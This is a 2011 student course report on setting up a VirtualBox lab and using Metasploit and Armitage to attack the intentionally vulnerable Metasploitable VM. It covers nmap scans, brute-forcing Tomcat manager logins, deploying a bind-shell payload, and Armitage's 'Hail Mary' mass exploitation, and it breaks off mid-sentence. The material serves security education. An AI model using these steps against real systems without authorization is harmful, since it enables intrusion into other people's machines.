Metasploit Penetration Testing in a Virtual...
Transcript of Metasploit Penetration Testing in a Virtual...
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 1
Fall 2011
Metasploit:
Penetration Testing in a Virtual Environment
(Final Draft)
Christopher Steiner
Dr. Janusz Zalewski
CNT 4104 Fall 2011 – Networks
Florida Gulf Coast University
Fort Myers, Florida
11-20-11
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 2
Fall 2011
1. Introduction
1.1 Project Overview
The purpose of this project is to initially create a series of virtual servers using Oracle
VM Virtual Box in order to create a test environment to run Metasploit and then repeat it in the
actual environment of the Computer Science network. The Metasploit Framework is considered
the de-facto standard for penetration testing. Metasploit is used to create a test environment in
order to better defend a network against hackers or cyber criminals. The penetration tests are
often run in a virtual test environment as to not interfere with actual network usage.
1.2 Metasploit
In order to understand the Metasploit Framework one needs to understand the basics of
penetration testing. A penetration test, sometimes referred to as pentest, is the equivalent of
hacking a secure network for the sole purpose of finding weaknesses for the betterment of the
network. These tests are usually run by the person in charge of the network security or the person
asked to find these vulnerabilities in the network and fix them. One thing that needs to be made
clear is that these pentests are to be done with the consent of the owner of the network, otherwise
it would just be hacking.
Metasploit was developed by H.D. Moore. He developed a framework for creation and
development of exploits and released a Perl-based Metasploit in October 2003. In 2004 H.D.
rewrote the Metasploit project with the help of Spoonm which included 19 exploits and 27
payloads. More about exploits, payloads and vulnerabilities is explained later in this report.
Metasploit was rewritten in Ruby in 2007. It grew rapidly due to an increasingly interested
security community and user contributions. Rapid7, a widely known vulnerability-scanning
firm, got a hold of Metasploit in 2009. With the acquisition both H.D. and Rapid7 were able to
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 3
Fall 2011
focus on the deployment of the Framework and commercial lines of Metasploit: Metasploit Pro
and Metasploit Express. [6]
The need for penetration testing is ever increasing as the external and internal threats to
network security have become more prevalent over the past decade. While the rapidly increasing
technological advances in networks are pushing our knowledge and abilities further, they are also
allowing a whole new breed of hacker to infiltrate and compromise networks. Frameworks such
as Metasploit allow network pentesters to provide the correct defense against the attacks.
1.2.1 Vulnerability
“A vulnerability is a security hole in a piece of software, hardware or operating system
that provides a potential angle to attack the system. A vulnerability can be as simple as weak
passwords or as complex as buffer overflows or SQL injection vulnerabilities.” [1]
As the name implies the vulnerable state of the network is in discussion here. One must
determine where these holes in security are and close them before they are found by an unwanted
intruder. These vulnerabilities are not limited to software, hardware or operating systems that are
in use in the system. They may be operating procedures of the company in question. As a
penetration tester, finding as much information about the inner workings of a company may lead
to possible vulnerabilities in their network. These days the intelligence gathering phase usually
includes Google hacking, social-media networks such as Facebook and other methods as well.
The old saying, “Loose lips, sink ships” stands true here as even employees have the
opportunity to be a vulnerability in a network. They may leak a secure password to the wrong
person. These holes in the security process are a little harder to close up. They have to be dealt
with in a different way than Metasploit works, but can be dealt with before other kinds of
penetration testing have started.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 4
Fall 2011
Once the greatest threats to the network have been identified the vulnerability analysis
starts with which attack would be the most viable. All of the information gathered from the
intelligence gathering phase, coupled with port and vulnerability scans will give the penetration
tester the best place to start in exploiting the network.
1.2.2 Exploits
Once the best vulnerability has been discovered in a network, a small and specialized
computer program, called an exploit, is used to take advantage of the vulnerability and give the
penetration tester access to the computer system. The exploits are used to deliver the payloads to
the target system. These payloads are the way that the penetration tester gains access to the
computer system. Payloads are introduced in the next section.
There are approximately over 180 exploits in the Metasploit Framework. Since the
security community is encouraged to get involved in the continuing development of exploits
there is currently a public database of usable exploits. The exploit database is constantly being
updated by community support and when new exploits are found they are posted.
1.2.3 Payloads
“Payloads are pieces of code that get executed on the target system as part of an exploit
attempt. A payload is usually sequence of assembly instructions, which helps achieve a specific
post-exploitation objective, such as adding a new user to the remote system, or launching a
command prompt and binding it to a local port. Traditionally, payloads were created from
scratch or modifying existing pieces of assembly code. This requires an in-depth knowledge not
only of assembly programming, but also of the internal workings of the target operating system.
But a number of scripts now enable payloads to be developed without needing to modify any
assembly code at all.” [5]
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 5
Fall 2011
The different types of payloads allow for different types of control the penetration tester
has over the target system. The most commonly used payload is called the Meterpreter. This
payload allows the penetration tester to turn on the target systems webcam, take control of the
mouse, keyboard and even take screenshots. All of these options are for the penetration tester to
see what exact holes there are in the system. Having access to key functions on one computer
may not necessarily mean control over the whole network, but it is a start in determining which
aspects of the network are the most vulnerable.
1.3 Oracle VM Virtual Box
In order to properly run a penetration test, a suitable network must be in place in order to
test. Instead of having physical machines, this project initially aims to run these penetration tests
in a completely virtual environment of the Oracle VM Virtual Box.
As processing power and memory management on server machines becomes more
powerful and easy to acquire, the opportunity to host these virtual networks becomes a more
likely candidate. The Oracle VM Virtual Box allows the user to be able to create virtualizations
of physical machines in order to either run them full time or do testing outside of a live
environment. Since this project is using multiple virtual environments from Ubuntu to Windows
Server 2003, there is a need to tap into the power that Oracle VM Virtual Box provides.
There are other programs out there such as VMWare Workstation, but for our purposes in
this experiment the free and easy access to Virtual Box will do just fine. There is even the
possibility of virtualizing the entire project with the Metasploit Test Lab as a virtualized machine
itself; however this goes beyond the scope of this project and perhaps may constitute an
extension to it.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 6
Fall 2011
This virtual network, even though it is hosted a single machine, will include multiple
operating systems in strong isolation from each other. This gives a great ease of access when
dealing with multiple hosts. If one had to go from machine to machine in order to check a part of
the test, it would be very time consuming and maybe, if the test was large enough, not feasible.
With access to any of the virtualized machines at any time, this test will cut down on significant
foot traffic and allow for a test environment that is secured and off the grid.
With the network being as isolated as it is, there is also the protection to the network the
Test Lab is hosted on. All of the network traffic is localized to the host Test Lab itself.
1.4 Armitage
Armitage is an open source graphical user interface for the Metasploit Framework. It
allows the user to see a visual representation of the network as well as allows point and click
exploitation and payload sending. In order to start using Armitage it must be installed on the
same test environment that the Metasploit Framework is installed.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 7
Fall 2011
2. Problem Description and Project Setup
2.1 Project Objective
The Metasploit Framework environment is created on a central server which will then
house three additional virtual machines. These virtual machines have different images on them
such as Ubuntu and Windows XP. The purpose of setting up these three different types of virtual
machines is to create a real world scenario in which a hacker might attempt to penetrate. Once
this test environment has proved itself a real test will be done on the FGCU Computer Science
Lab network.
2.1.1 Basic Configuration
It is assumed that all virtual machines will be running simultaneously and that the
penetration tests will be executed on all virtual machines. A sample Metasploit layout is
presented in Figure 2.1.
Figure 2.1 – Metasploit Example Layout
The following configureation items are needed in order to create a working test lab on a
single machine with Metasploit:
Metasploit Framework [1]
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 8
Fall 2011
Computer with the following specifications
o Intel Core 2 Quad @2.66 GHZ
o 8GB of RAM
o 500GB HDD
o Windows 7 x64
Oracle VM Virtual Box [2]
Metasploitable Image [7]
Ultimate LAMP Image [8]
Windows XP Image
Armitage [10]
2.2 Setting Up a Test Lab on a Single Machine
In order to create a test lab on a single machine we first need to set up the three different
virtual machines. For this test lab a Virtual Box is used to emulate a network to penetrate. The
first thing one needs to do is to download and install Virtual Box and the next step is to
download and install Metasploit. After these two applications have been downloaded and
installed, one then needs to set up the Virtual Machines for each of the three operating systems.
2.2.1 Installing Oracle VM Virtual Box
The process of virtualizing the three test environments to create the overall test lab starts
with downloading Virtual Box [3]. Since the Test Lab is running on a Windows based machine
one needs to download the Virtual Box 4.1.4 for Windows hosts x86 the process is shown in
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 9
Fall 2011
figures 2.2-2.7. It starts with clicking on the x86/amd64 link and save the file. Once Virtual Box
is downloaded, double click the executable to start the install process.
Figure 2.2 – Select Next
Figure 2.3 – Select Next
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 10
Fall 2011
Figure 2.4 – Select Yes
Figure 2.5 Select Install
After selecting install in Figure 2.5 Virtual Box will install, Once it is completed Next
and Finish have to be selected as in Figures 2.6 and 2.7.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 11
Fall 2011
Figure 2.6 – Select Next
Figure 2.7 – Select Finish
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 12
Fall 2011
Figure 2.8 – Virtual Box is installed.
If the screen shown in Figure 2.8 appears then Virtual Box has successfully installed. One
can close this for now since next, one needs to set up Metasploit and get images ready to
continue setting up the Test Lab.
2.2.2 Installing Metasploit
Now that the Virtual Box is installed and ready to go, it is time to set up the penetration
testing software, Metasploit. The Metasploit Framework is to be installed on a Windows based
test environment so one needs to download the Latest Windows Installer [4] executable setup for
Windows machines. Save the executable and once it is downloaded the install process can start.
This is shown in Figures 2.9-2.19
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 13
Fall 2011
Figure 2.9 – Turn off antivirus software. Select Ok.
Figure 2.10 – Turn off Windows firewall. Select Ok.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 14
Fall 2011
Figure 2.11 – Select Next
Figure 2.12 – Select “I accept the agreement”. Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 15
Fall 2011
Figure 2.13 – Select a folder to install. Select Next.
Figure 2.14 –Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 16
Fall 2011
Figure 2.15 – This will generate SSL certificate for this server. Select Next.
Figure 2.16 – Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 17
Fall 2011
Figure 2.17 – Select Next.
Figure 2.18 – Wait for Metasploit to install.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 18
Fall 2011
Figure 2.19 – Uncheck “Access Metasploit Web UI?”. Select Finish.
Once the screen shown in Figure 2.19 appears, the Metasploit Framework has been
successfully installed. It is recommended to do a reboot of the Test Lab computer before moving
to the next step.
2.2.3 Preparing Test Machines
Making sure that Virtual Box and the Metasploit Framework are installed correctly, one
can now turn to creating the three virtual environments. The steps for all three are the same, so
the instructions below refer to setting up just one of the three, Windows XP, and the rest should
be done in the same manner. Figure 2.20 – 2.29 explain the setup process.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 19
Fall 2011
Figure 2.20 – Select New.
Figure 2.21 – Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 20
Fall 2011
Figure 2.22 – Enter the name of the VM. Select the Operating System and Version. Select
Next.
Figure 2.23 – Set the allocated RAM. For these VMs 1024 megabytes will suffice. Select
Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 21
Fall 2011
Figure 2.24 – Select Next.
Figure 2.25 – Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 22
Fall 2011
Figure 2.26 – Select Next.
Figure 2.27 – Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 23
Fall 2011
Figure 2.28 – Select Create.
Figure 2.29 – Select Create again.
Once the virtual machine is created, one needs install an operating system onto it. For this
example it is a lightweight version of Windows XP that is only 360MB. Any version of XP can
also be used and it is recommended that it be from an image file (.iso) so that it is easily
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 24
Fall 2011
accessible in case a new virtual machine needs to be created from the same image. The process is
shown in Figures 2.30 – 2.34.
Figure 2.30 - First open Virtual Box and select New.
Figure 2.31 – Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 25
Fall 2011
Figure 2.32 – Select the Media Source. Select Next.
Figure 2.33 – Select Start.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 26
Fall 2011
Figure 2.34 – Highlight the newly created VM and select Start.
Once the Virtual Machine loads, there are other usual steps in order to install the
operating system. Following the on screen instructions and installing each operating system in its
own way will do it. Now one can start each of the three operating systems simultaneously.
Configuring network settings and Metasploit Framework is described in Section 3.
2.2.4 Preparing Metasploitable Test Machine
This project uses the Metasploitable test machine from Rapid7, which is an environment
built specifically to focus on network-layer vulnerabilities. The Metasploitable machine is in
torrent format so a BitTorrent software is needed in order to download the virtual machine [7].
The steps to use an existing virtual machine are similar to creating a new one and are described
in Figures 2.35-2.40. The first is to open Virtual Box as shown in Figure 2.35.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 27
Fall 2011
Figure 2.35 – Select New.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 28
Fall 2011
Figure 2.36 – Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 29
Fall 2011
2.37 – Set the Name of the VM and Select Linux and Ubuntu for the Metasploitable VM.
Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 30
Fall 2011
Figure 2.38 – Set the amount of Memory to use. Suggested 2048MB. Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 31
Fall 2011
Figure 2.39 – Select Use Existing Hard Disk and use the option to search for the
Metasploitable.vmdk. Select Next.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 32
Fall 2011
Figure 2.40 – Select Create.
Once the Metasploitable virtual machine is created one can start it and use it for testing
exploits and payloads. In Section 3 there is a discussion of setting up the network settings in
order to create a link between the host Test Machine and the Target Exploitable Machine.
2.2.5 Downloading and Installing Armitage
Armitage is a user interface for metasploit to be used in this project. In order to install
Armitage it must be downloaded from the Armitage website [10]. The screenshots in figures 2.41
and 2.42 show the download process.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 33
Fall 2011
Figure 2.41 – Click the Download Link
On the download page we will be selecting the .zip link.
Figure 2.42 – Click the .zip link and download Armitage.
Once Armitage.zip has been downloaded it must first be unzipped.
Figure 2.40 – Contents of the .zip
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 34
Fall 2011
The steps below is describe taking the contents of the Armitage.zip file that was
downloaded and moving them to the correct location. After that, it is a matter of updating the
Metasploit Framework and initializing the database.
1. Copy the contents into a folder called Armitage on the C: drive. 2. Start -> Programs -> Metasploit -> Framework -> Framework Update 3. Start -> Programs -> Metasploit -> Framework -> Framework Console (do this once to
initialize the database)
To run Armitage one needs to follow these steps:
Start -> Programs -> Metasploit -> Framework -> Armitage Click Connect Click Yes when asked whether or not to start Metasploit's RPC daemon If asked where Metasploit is installed, select the Metasploit directory. You will only need
to do this once.
Figure 2.41 – Armitage is successfully installed and running.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 35
Fall 2011
3. Test / Preparation
3.1 Overview
This project utilizes the Metasploit Framework in unison with Oracle VM Virtual Box
software in order to create a formidable test environment for penetration testing. The
virtualization of multiple computers is needed in order to show the power and functionality of
the Metasploit Framework. This project requires that all of the virtualized machines (VMs) be
on the same network. Once these VMs have been created the Metasploit Framework is then used
in order to find vulnerabilities, create exploits and deliver payloads to the VMs.
The output of these tests is then documented and different test cases are to be monitored.
The test environment will be runs off of a machine in the FGCU Computer Science Lab. This
test environment is loaded with the Metasploit Framework and hosts all three of the VMs.
Once testing of the virtual machines has been accomplished a test on the FGCU
Computer Science Lab network will be run. This will attempt to scan and find vulnerabilities in
the network and attempt to exploit them.
3.2 Current Testing Environment
Currently the Metasploit Test Lab includes the host machine with one Virtual Machine
running with Metasploit’s own test server, Metasploitable. After downloading the
Metasploitable image from Metasploit’s website [1], the image is loaded into Virtual Box and
booted up, as shown in Figure 3.1.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 36
Fall 2011
Figure 3.1 – Booted Metasploitable image.
Once the Metasploitable virtual machine is ready for action, the Metasploit framework
can be started in order to start exploiting our target machine. The image in Figure 3.2 shows the
launched msfconsole. Msfconsole is launched by going to the Start menu and under Metasploit
choosing Metasploit console.
Figure 3.2 – msfconsole ready and waiting for input
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 37
Fall 2011
Once the msfconsole is ready one needs to set up the virtual network and then can start
doing some penetration testing on the Metasploitable virtual machine. The implementation of
this testing is discussed in Section 4.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 38
Fall 2011
4. Implementation
4.1 Setting up the Virtual Network
When Virtual Box is installed a new network adapter is created. This network adapter is
called VirtualBox Host-Only Network. This is the network adapter that will be used in order to
create a local area network with virtual target machines. Figure 4.1 shows the VirtualBox Host-
Only Network adapter that will be used.
Figure 4.1 – VirtualBox Host-Only Network
The virtual target machines need to be created next, in order to change the network
settings. The Metasploitable virtual machine is used to show how to change the network settings
to use the virtual local network.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 39
Fall 2011
Figure 4.2 – Highlight the Metasploitable Virtual Machine. Click Settings.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 40
Fall 2011
Figure 4.3 – Select Network and in the dropdown for Attached to: Select Host-Only
Adapter.
This is shown in Figures 4.2 and 4.3. It will allow the virtual machine to connect to the
network adapter created by Virtual Box, establishing a link to the virtual local network.
To verify network connectivity, the Metasploitable virtual machine has to be started first.
Once started, the user has to log in with credentials “msfadmin: msfadmin.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 41
Fall 2011
Figure 4.4 – Screen that appears after logging in.
After logging in, the screen shown in Figured 4.4 should appear. The ifconfig command
should be run next, as shown in Figure 4.5. Since this machine was created first and is the only
one on the virtual network it was given an IP address of 192.168.56.101. One can now use this IP
address to run a ping in the Host machine, which is shown in Figure 4.6
Figure 4.5 – Response from ifconfig on Metasploitable
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 42
Fall 2011
Figure 4.6 – Successful ping attempt.
The virtual network has been created and the Host and Target machine are
communicating. Now exploits can be created and executed between the machines.
4.2 Selecting an Exploit
Before selecting or using exploits it is advisable to take a snapshot of the Target machine
so that it may be reverted back to default. This will save time later as a complete reinstall might
be needed after some exploits.
To do this on the target machine select Machine > Take Snapshot. This will bring up the
screen shown in Figure 4.7.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 43
Fall 2011
Figure 4.7 – Taking a snapshot. Put in Snapshot name and hit Ok.
In order to discover vulnerabilities to exploit, the first thing that must be done is
discovering machines on the network. This would be done in a normal testing environment so it
should be included here in order to know the function.
First one would sweep the network with a simple Ping scan to determine which hosts are
online. This is done with the command: nmap –sP 192.168.56.1/24, as shown in Figure 4.8.
Figure 4.8 – NMAP scan results
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 44
Fall 2011
There are three hosts on this network, 192.168.56.1, 192.168.56.101 and 192.168.56.101.
Since it is known that the Metasploitable target machine is 192.168.56.101 the remainder of the
exploit will be using this IP address as the Target.
Now that the IP address is known, the next step is to scan out what programs are running
on which ports. The program chosen this way will be used in the exploit to gain access to the
machine, so one must know the port numbers. The respective command is: nmap –sV
192.168.56.101, as shown in Figure 4.9
Figure 4.9 – NMAP port scan results
For this example the Apache Tomcat/Coyote JSP engine 1.1 is used next, to exploit. It
has an open port on 8180.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 45
Fall 2011
This example named 'Tomcat Application Manager Login Utility', is provided by Matteo
Cantoni, and jduck, to test credentials against a Tomcat application.
Figure 4.10 – Select Exploit
Setting up the exploit includes: using the exploit location, setting the RHOSTS which one
will be exploiting (in this case 192.168.56.101), setting the RPORT (in this case 8180) and
entering the “exploit” command, as shown in Figure 4.10.
The results of this are a huge list of attempts of username/password pairs. The following
diagram in Figure 4.11 shows a viable username/password pair.
Figure 4.11 – Found successful login
Now that a successful username/password has been found, an exploit can be set up to
send a payload.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 46
Fall 2011
4.3 Payloads
Metasploit contains many different types of payloads, each serving a unique role within
the framework. Let's take a brief look at the various types of payloads available and get an idea
of when each type should be used.
Inline (Non Staged)
A single payload containing the exploit and full shell code for the selected task.
Inline payloads are by design more stable than their counterparts because they
contain everything all in one. However some exploits won’t support the resulting
size of these payloads.
Staged
Stager payloads work in conjunction with stage payloads in order to perform a
specific task. A stager establishes a communication channel between the attacker
and the victim and reads in a stage payload to execute on the remote host.
Meterpreter
Meterpreter, the short form of Meta-Interpreter is an advanced, multi-faceted
payload that operates via dll injection. The Meterpreter resides completely in the
memory of the remote host and leaves no traces on the hard drive, making it very
difficult to detect with conventional forensic techniques. Scripts and plugins can
be loaded and unloaded dynamically as required and Meterpreter development is
very strong and constantly evolving.
PassiveX
PassiveX is a payload that can help in circumventing restrictive outbound
firewalls. It does this by using an ActiveX control to create a hidden instance of
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 47
Fall 2011
Internet Explorer. Using the new ActiveX control, it communicates with the
attacker via HTTP requests and responses.
NoNX
The NX (No eXecute) bit is a feature built into some CPUs to prevent code from
executing in certain areas of memory. In Windows, NX is implemented as Data
Execution Prevention (DEP). The Metasploit NoNX payloads are designed to
circumvent DEP.
Ord
Ordinal payloads are Windows stager based payloads that have distinct
advantages and disadvantages. The advantages are that it works on every flavor
and language of Windows dating back to Windows 9x without the explicit
definition of a return address. They are also extremely tiny. However two very
specific disadvantages make them not the default choice. The first one is that it
relies on the fact that ws2_32.dll is loaded in the process being exploited before
exploitation. The second one is that it's a bit less stable than the other stagers.
IPv6
The Metasploit IPv6 payloads, as the name indicates, are built to function over
IPv6 networks.
As soon as valid credentials have been found, jduck's Tomcat Manager Application
Deployer (tomcat_mgr_deploy) can be used against it, as shown in Figure 4.12.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 48
Fall 2011
Figure 4.12 – Setting up tomcat_mgr_deply
Once these settings have been set up correctly, a payload can be set and exploited. In
order to find a valid payload one can use the command show payloads, as presented in Figure
4.13.
4.13 – Valid Payloads
Since Apache Tomcat is using a JSP engine the best exploit to use would be
java/shell/bind_tcp in order to open a connection to Metasploitable and control the shell. The
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 49
Fall 2011
respective command to set a payload is: ‘set PAYLOAD java/shell/bind_tcp’, then exploit, as
shown in Figure 4.14.
Figure 4.14 – Successful payload delivery
After this, control of the shell of the target is possible, as shown in Figure 4.15.
Figure 4.15 – ls command on remote shell
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 50
Fall 2011
4.4 FGCU Computer Science Lab Network Penetration Test
After the virtual test environment has been successfully exploited, Armitage can be used as a
tool in order to scan and locate vulnerabilities on the FGCU Computer Science Lab network
using the designated lab computer in the FGCU Computer Science Lab to conduct the scan. The
lab computer must be on the FGCU Computer Science Lab network in order to exclude the main
FGCU network. The IP address used for the designated lab computer is 69.88.163.15.
To start Armitage on the FGCU Lab Computer, follow this step as shown in Figure 4.16.
Go to Start -> Metasploit -> Framework -> Armitage in order to start Armitage.
Figure 4.16 – Location of Armitage on Lab Computer
When running Armitage a prompt will come up as shown in Figure 4.17, click Connect.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 51
Fall 2011
Figure 4.17 – Connect screen for Armitage
Once Armitage is running go to Hosts -> Nmap Scan -> Quick Scan, as shown in Figure
4.18.
Figure 4.18 – Quick Scan
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 52
Fall 2011
Then enter the IP range you wish to run the scan on. This example uses the CS network
69.88.163.0/24. Then click OK, as shown in Figure 4.19.
Figure 4.19 – Scan range.
Once the scan is completed the discovered targets will appear in the upper part of the
console. As shown in Figure 4.20 IP addresses will also appear. One can dig down into each
individual target by right clicking the target and clicking on Scan. This will run a multitude of
scans on the individual target and show what is running on the open ports. It will also show what
type of operating system the target is running, in case there are ports open. If there are no open
ports or Armitage cannot gather enough information about the target, the icon for the target will
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 53
Fall 2011
remain blank. It will show a Windows symbol for Windows targets and a Tux Penguin for Linux
targets.
Figure 4.20 – After a scan of the network.
There are two ways to initiate attacks. One way is by going to Attacks -> Find
Attacks. This will give a list of attacks by target. This list can be accessed by right clicking on
the target and going to the Attacks menu item from the drop down as shown in Figure 4.21. The
other way is to do a Hail Mary as shown in Figure 4.22. The Hail Mary will generate a list of all
possible exploits that pertain to the current network setup. It will then execute each exploit one
by one until a vulnerability is found.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 54
Fall 2011
Figure 4.21 – Attack menu of one of the targets.
Figure 4.22 – A Hail Mary attempt.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 55
Fall 2011
In Figure 4.22 the Hail Mary attempt yielded no vulnerabilities on the network. It tried all
of the exploits and no sessions were created. If a session had been created it would be a sign that
one of the exploits completed correctly. Even though this attempt isn’t the most in depth scan of
the vulnerabilities, each target can be checked individually in the Attack dropdown menu. This
network yielded no vulnerabilities that Metasploit and Armitage could find.
4.5 Using Armitage with Metasploitable
Another example is to use the Metasploitable virtual machine in order to replicate the
attempt on the Tomcat web server. A quick scan can be done for the virtual network by using
192.168.56.0/24. Figures 4.23 and 4.24 show this process.
Figure 4.23 – Quick Scan (OS Detect)
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 56
Fall 2011
Figure 4.24 – Entering the IP range for the virtual network. Click OK.
Once the scan is completed the Metaploitable virtual machine, which is 192.168.56.102,
will show under the targets screen along with the machine that the scan was run from. Figure
4.25 shows the two machines in the targets screen.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 57
Fall 2011
Figure 4.25 – Local machine and Metasplotiable virtual machine
Right clicking on the Metasploitable machine will yield a drop down menu that is shown
in Figure 4.26. The menu includes Login, Services, Scan and Host. Since no intensive scan has
been done on this machine, one will need to be run. In the drop down menu select Scan.
Figure 4.26 – Drop down menu options for this machine. Select Scan.
Once the scan has finished one can see which services this machine is running by
selecting the Services option from the drop down shown in Figure 4.26. This brings a new tab in
the console section of Armitage with a list of currently running processes. Figure 4.27 shows this
tab.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 58
Fall 2011
Figure 4.27 – Services tab for Metasploitable machine
The list in 4.27 shows all of the open ports that the Metasploitable machine is running. In
order to see which attacks can be used one must first Find Attacks. Figure 4.28 and 4.29 show
how this is done.
Figure 4.28 – Select Attacks, then Find Attacks.
Figure 4.29 – After the analysis is complete, click OK.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 59
Fall 2011
Armitage has provided a list of attacks that can now be accessed when right clicking the
Metasploitable machine as shown in Figure 4.30. This list of attacks can be used intuitively to
initiate attacks immediately or run auxiliary scans before these attacks. Such is the case with
tomcat_mgr_deploy. This exploit will not work without a user name and password entered into
the options. One must find a valid user name and password pair. The tomcat_mgr_login exploit
is used for brute forcing log-in attempts until a successful log-in is found.
Figure 4.30 – Attack list showing available exploits.
In order to search for this auxiliary scan, one can use the exploit database on the left hand
side of Armitage. Figure 4.31 shows how to use this search feature to find tomcat_mgr_login.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 60
Fall 2011
Figure 4.31 – Type tomcat into the search and hit enter.
Double clicking the tomcat_mgr_login scanner will bring up an options window. This
options window is used for managing the exploits individual options and once these are all set,
launching the exploit. Figure 4.27 shows the services that are currently running on the Metasploit
virtual machine, the tomcat server is running on port 8180. This is important to understand
because the port needs to be set correctly in the options. Figure 4.32 shows how the option
window looks.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 61
Fall 2011
Figure 4.32 – Set the correct port and then click Launch.
The tomcat_mgr_login scanner will run and detect the user name and password
combination tomcat/tomcat as a valid login. This is then used in the attack itself. Following
Figure 4.30, select tomcat_mgr_deploy and once again set the correct settings for username,
password and port as shown in figure 4.33.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 62
Fall 2011
Figure 4.33 – Set the Username, password and port. Then click Launch
Once the exploit finishes running, it should complete successfully and then the
Metasploitable machine's icon that shows in the target section of Armitage will turn red and
lightning bolts will surround it. This will also allow for a new drop down menu item to be seen
called Meterpreter which is uses in order to gain access to the machine. Figures 4.33 and 4.34
show this change in icon and new drop down option.
4.33 – Exploited Metasploitable machine.
Metasploit Penetration Testing in a Virtual Environment
Christopher Steiner Florida Gulf Coast University P a g e | 63
Fall 2011
Figure 4.34 – Meterpreter session opened, showing explore options.
Once the session has been opened, one can browse files on the remote machine, show the
